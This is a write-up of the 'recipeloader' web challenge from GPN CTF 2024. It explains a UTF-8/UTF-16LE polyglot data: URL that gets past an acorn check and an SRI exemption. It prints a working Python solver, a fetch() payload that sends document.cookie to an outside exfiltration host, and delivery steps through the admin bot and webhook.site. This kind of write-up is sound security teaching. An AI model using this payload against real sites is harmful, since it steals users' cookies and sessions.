recipeloader
gpn24
Task: a client page validates a fetched JS recipe = "..." assignment with acorn, then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL. The UTF-8 view passes acorn's string-literal check; the UTF-16LE view (honored when the URL is loaded by <script>) runs fetch() to exfiltrate the admin bot's flag cookie.
recipeloader — GPN CTF 2024 (gpn24)
Description
You can load a javascript recipe pls no(w) xss
English summary: A client page (http://localhost:1337/) takes a ?url= parameter,
fetch()es it, validates the text as a strict recipe = "..." assignment using the
acorn parser, then injects the same URL as a <script src=url>. Non-static URL
schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes
(data:, blob:, ...) are exempted. An admin bot stores the flag in a normal,
non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an
attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.
Analysis
The vulnerable load pattern (index.html)
    async function runScript(url) {
      const txt = await fetch(url).then(r => r.text());
      if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program");
      const s = document.createElement("script");
      s.src = url;
      if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`;
      document.head.appendChild(s);
    }
This is a classic check-then-load (TOCTOU) pattern: the validated bytes
(txt from fetch) and the executed bytes (whatever <script src=url> resolves
to) are two independent loads. The only thing keeping them identical is the SRI
integrity attribute.
- isRecipeAssignmentProgram(src) runs acorn with sourceType: "script" and demands EXACTLY: body.length === 1, a single ExpressionStatement that is an AssignmentExpression with operator "=", left = Identifier named recipe, right = a string Literal or expression-free TemplateLiteral. In other words, the text must be exactly recipe = "...".
- isScriptStatic(url) parses the URL and looks at the protocol:
  - staticProtos = [data, blob, javascript, mailto, resource, ssh, tel] → no integrity.
  - nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss] → integrity applied.
  - Unknown protocol → throws.
- sha256() uses Uint8Array.prototype.toBase64() to build the SRI digest.
- After load, show() does recipeTarget.textContent = recipe. Because it assigns textContent, no direct HTML injection is possible; we genuinely need script execution.
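The scheme-based exemption described above can be sketched in Python. This is only an illustrative port, not the challenge's code: the names is_script_static, sri_sha256 and integrity_for are hypothetical, the scheme lists are copied from the writeup, and urllib's scheme parsing is assumed to be close enough to the browser's URL parser for these inputs.

```python
import base64
import hashlib
from urllib.parse import urlsplit

# Scheme lists as described in the writeup.
STATIC_PROTOS = {"data", "blob", "javascript", "mailto", "resource", "ssh", "tel"}
NONSTATIC_PROTOS = {"file", "ftp", "http", "https", "urn", "view-source", "ws", "wss"}


def is_script_static(url: str) -> bool:
    """Hypothetical port of isScriptStatic: classify a URL by its scheme."""
    scheme = urlsplit(url).scheme.lower()
    if scheme in STATIC_PROTOS:
        return True
    if scheme in NONSTATIC_PROTOS:
        return False
    raise ValueError(f"unknown protocol: {scheme!r}")


def sri_sha256(text: str) -> str:
    """Build an SRI-style value: 'sha256-' + base64 of the SHA-256 digest."""
    digest = hashlib.sha256(text.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def integrity_for(url: str, validated_text: str):
    """Return the integrity value the page would attach, or None if exempt."""
    return None if is_script_static(url) else sri_sha256(validated_text)


if __name__ == "__main__":
    # data: is exempt, so nothing ties the executed bytes to the validated text.
    print(integrity_for("data:text/javascript,recipe%20%3D%22x%22", 'recipe ="x"'))
    print(integrity_for("https://example.com/r.js", 'recipe ="x"'))
```

The point of the sketch is the None branch: for a data: URL the validated text never constrains what the script element later executes.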
The bot (admin.js)
- GET /bot/run requires typeof url === 'string' && url.startsWith('http://localhost:1337').
- Headless chromium (playwright) goes to http://localhost:1337, runs document.cookie = "flag" + process.env.FLAG (cookie name is flag, value is the flag), then navigates to the attacker URL, waits 10s, logs document.cookie, closes.
So the flag is a normal same-origin cookie. Any JS executing on localhost:1337
can read it and exfiltrate it.
The key weakness — SRI exemption + decoding differential
For http:// and https:// URLs the SRI binding makes the validated text and the executed
script byte-identical, so they cannot diverge. But data: is in staticProtos,
so no integrity is enforced. We just need ONE byte sequence that:
- when decoded by fetch().text() → passes the strict recipe = "..." acorn check, and
- when executed by <script src=...> → is arbitrary JavaScript.
The differential that makes this possible:
- fetch('data:...').text() decodes the body as UTF-8 and IGNORES the ;charset= parameter. Verified empirically: fetch('data:text/plain;charset=UTF-16LE,AB') returns the 2 ASCII chars A, B, not one UTF-16 code unit.
- <script src="data:...;charset=UTF-16LE,..."> HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encoded window.__ran='YES' ran when loaded as a charset=UTF-16LE script.
Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.
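The two readings of one byte sequence can be reproduced offline. In this small sketch Python's codecs merely stand in for the two browser decoders; it shows the decoding difference only and does not reproduce the browser behavior itself.

```python
# Bytes of a tiny script, encoded as UTF-16LE: each ASCII char is followed by 0x00.
raw = "window.__ran='YES'".encode("utf-16le")

utf8_view = raw.decode("utf-8")      # stand-in for the text fetch().text() returns
utf16_view = raw.decode("utf-16le")  # stand-in for the text the script element runs

print(repr(utf8_view[:8]))   # ASCII characters interleaved with NULs
print(utf16_view)            # the original one-line script

# The two-byte probe from the writeup: two characters as UTF-8, one as UTF-16LE.
ab = b"AB"
print(len(ab.decode("utf-8")), len(ab.decode("utf-16le")))
```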
Solution
Polyglot construction
We force a UTF-8 prefix recipe =" (note the space before =) and fill the
string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily
accepts raw NULs inside a string literal, so the UTF-8 view is a valid
recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes
to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.
Engineering constraints (all required):
- Space before =. In UTF-16LE the bytes r e c i p e SP = " decode to a run of CJK code points (敲 楣 数 㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomes U+223D (∽, a math symbol), which is not an identifier char and breaks the UTF-16 program.
- Avoid " (0x22) and \ (0x5c) inside the UTF-8 string body: those bytes would prematurely close/escape the UTF-8 string literal. Use single quotes in the payload.
- Parity / alignment. recipe =" is 9 bytes (odd). One filler byte 0x3d (=) is prepended to the payload so the first UTF-16 unit after the prefix (0x22 paired with 0x3d → U+3D22, a valid identifier-continue char) keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ascii+NUL interleaving. A trailing space byte is added before the closing " to keep the total length even. With this layout the unpadded length is 9 + 1 + 2n + 1 for an n-character payload, which is always odd, so the pad is always needed; the pair 0x20 0x22 becomes the final unit U+2220 (∠), which falls inside the UTF-16 // comment.
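The byte pairing behind the first and third constraints can be checked with a few lines of Python. One assumption to flag: str.isidentifier() follows Python's identifier rules (XID_Start/XID_Continue), used here only as a proxy for JavaScript's ID_Start/ID_Continue; the two agree for these code points but are not the same definition.

```python
import unicodedata

# Prefix plus the 0x3d filler byte: 10 bytes, i.e. five UTF-16LE code units.
with_space = b'recipe ="' + b"="
# Same prefix without the space: 8 bytes, four UTF-16LE code units.
without_space = b'recipe="'

ident_ok = with_space.decode("utf-16le")
ident_bad = without_space.decode("utf-16le")

for label, text in (("with space", ident_ok), ("without space", ident_bad)):
    units = " ".join(f"U+{ord(ch):04X}" for ch in text)
    cats = " ".join(unicodedata.category(ch) for ch in text)
    # isidentifier() is a Python-side proxy for "valid JS identifier".
    print(f"{label}: {text} [{units}] [{cats}] identifier={text.isidentifier()}")
```

With the space, every unit is a CJK letter (category Lo); without it, the last unit is U+223D with category Sm, which is what breaks the leading identifier.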
Final UTF-16LE program that actually runs:
敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠
In sloppy/script mode this assigns the fetch(...) result to an implicit global
(allowed), and the trailing // comments out the leftover units (the closing-quote
byte etc). The fetch leaks document.cookie to the attacker host.
Both views were validated programmatically: the UTF-8 view passes the exact acorn
recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid
sloppy-mode script.
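A lightweight stand-in for that validation, checking only the byte-level constraints listed earlier, might look like the following. It is not a replacement for running acorn or a real JS parser: check_polyglot is a hypothetical helper, and the sample bytes use the placeholder host EXFILHOST/exfil.

```python
PREFIX = b'recipe ="'


def check_polyglot(full: bytes) -> str:
    """Check the byte-level constraints and return the UTF-16LE view."""
    assert len(full) % 2 == 0, "odd length: last UTF-16 unit would be truncated"
    assert full.startswith(PREFIX) and full.endswith(b'"'), "not recipe =\"...\""
    body = full[len(PREFIX):-1]
    # Bytes that would close, escape, or break the UTF-8 string literal.
    for bad in (0x22, 0x5C, 0x0A, 0x0D):
        assert bad not in body, f"forbidden byte 0x{bad:02x} in string body"
    full.decode("utf-8")  # the UTF-8 view must at least decode cleanly
    utf16_view = full.decode("utf-16le")
    # Everything after the last // must stay inside that comment.
    tail = utf16_view.rpartition("//")[2]
    assert not any(ch in tail for ch in "\n\r\u2028\u2029"), "comment ends early"
    return utf16_view


if __name__ == "__main__":
    js = "=fetch('//EXFILHOST/exfil?'+document.cookie)//"
    sample = PREFIX + b"=" + js.encode("utf-16le") + b' "'
    print(check_polyglot(sample))
```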
Reusable solver — gen_payload.py
    #!/usr/bin/env python3
    import sys, urllib.parse

    EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil"
    TARGET = "http://localhost:1337/"

    def utf16_ascii(s):
        out = bytearray()
        for ch in s:
            c = ord(ch); assert c < 128, ch
            out += bytes([c, 0])
        return bytes(out)

    pre = b'recipe ="'  # space before = is required for UTF-16 alignment
    payload = "=fetch('//" + EXFIL + "?'+document.cookie)//"  # no " or \ allowed
    content = bytes([0x3d]) + utf16_ascii(payload)
    body = pre + content
    full = body + b'"'
    if len(full) % 2 != 0:
        full = body + b' "'

    enc = ''.join('%%%02X' % b for b in full)
    data_url = 'data:text/javascript;charset=UTF-16LE,' + enc
    attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='')
    bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='')

    print("UTF-8 view:", full.decode('utf-8'))
    print("UTF-16 view:", full.decode('utf-16le'))
    print("DATA URL:\n" + data_url)
    print("ATTACK URL:\n" + attack_url)
    print("BOT URL:\n" + bot_url)
Delivery / exploitation steps
- Generate the data: URL with a readable exfil host (used webhook.site; created a token via POST https://webhook.site/token).
- Build the attack URL: http://localhost:1337/?url=<urlencoded data: URL>. It starts with http://localhost:1337, so it passes the bot's startsWith check.
- Submit to the bot: GET https://<instance>/bot/run?url=<urlencoded attack URL> → bot replies ok.
- The bot sets cookie flag+FLAG on localhost:1337, then visits the attack URL. The page fetch()es the data: URL (UTF-8 → valid recipe, passes validation, no SRI because data: is "static"), then loads the same data: URL as a <script charset=UTF-16LE> which executes the UTF-16 payload and fetches //webhook/?<document.cookie>.
- Poll the webhook; received ...?flagGPNCTF{url_p4RSIN6_15_HArd_EVEN_FOr_BrOw5ers} (cookie name flag + flag value).
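The two layers of URL encoding in these steps are easy to get wrong, so here is a small round-trip sketch. The helper names wrap and unwrap are hypothetical, the data: URL is a shortened placeholder rather than the real payload, and parse_qs is only an approximation of how the server and the page read ?url=.

```python
from urllib.parse import parse_qs, quote, urlsplit

PAGE = "http://localhost:1337/"
BOT = "http://localhost:1337/bot/run"  # on a remote instance: https://<instance>/bot/run


def wrap(data_url: str, page: str = PAGE, bot: str = BOT):
    """Nest the data: URL inside the page URL, then that inside the bot URL."""
    attack_url = page + "?url=" + quote(data_url, safe="")
    bot_url = bot + "?url=" + quote(attack_url, safe="")
    return attack_url, bot_url


def unwrap(url: str) -> str:
    """Read back the ?url= parameter, decoding exactly one layer."""
    return parse_qs(urlsplit(url).query)["url"][0]


if __name__ == "__main__":
    # Placeholder payload: just the percent-encoded prefix bytes, not the full exploit.
    data_url = "data:text/javascript;charset=UTF-16LE,%72%65%63%69%70%65%20%3D%22"
    attack_url, bot_url = wrap(data_url)
    print(attack_url.startswith("http://localhost:1337"))  # the bot's prefix check
    print(unwrap(bot_url) == attack_url, unwrap(attack_url) == data_url)
```

Each layer is decoded exactly once on the way in, so the percent-escapes inside the data: URL survive intact until the page fetches it.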
The flag text itself confirms the bug class: "url parsing is hard even for browsers."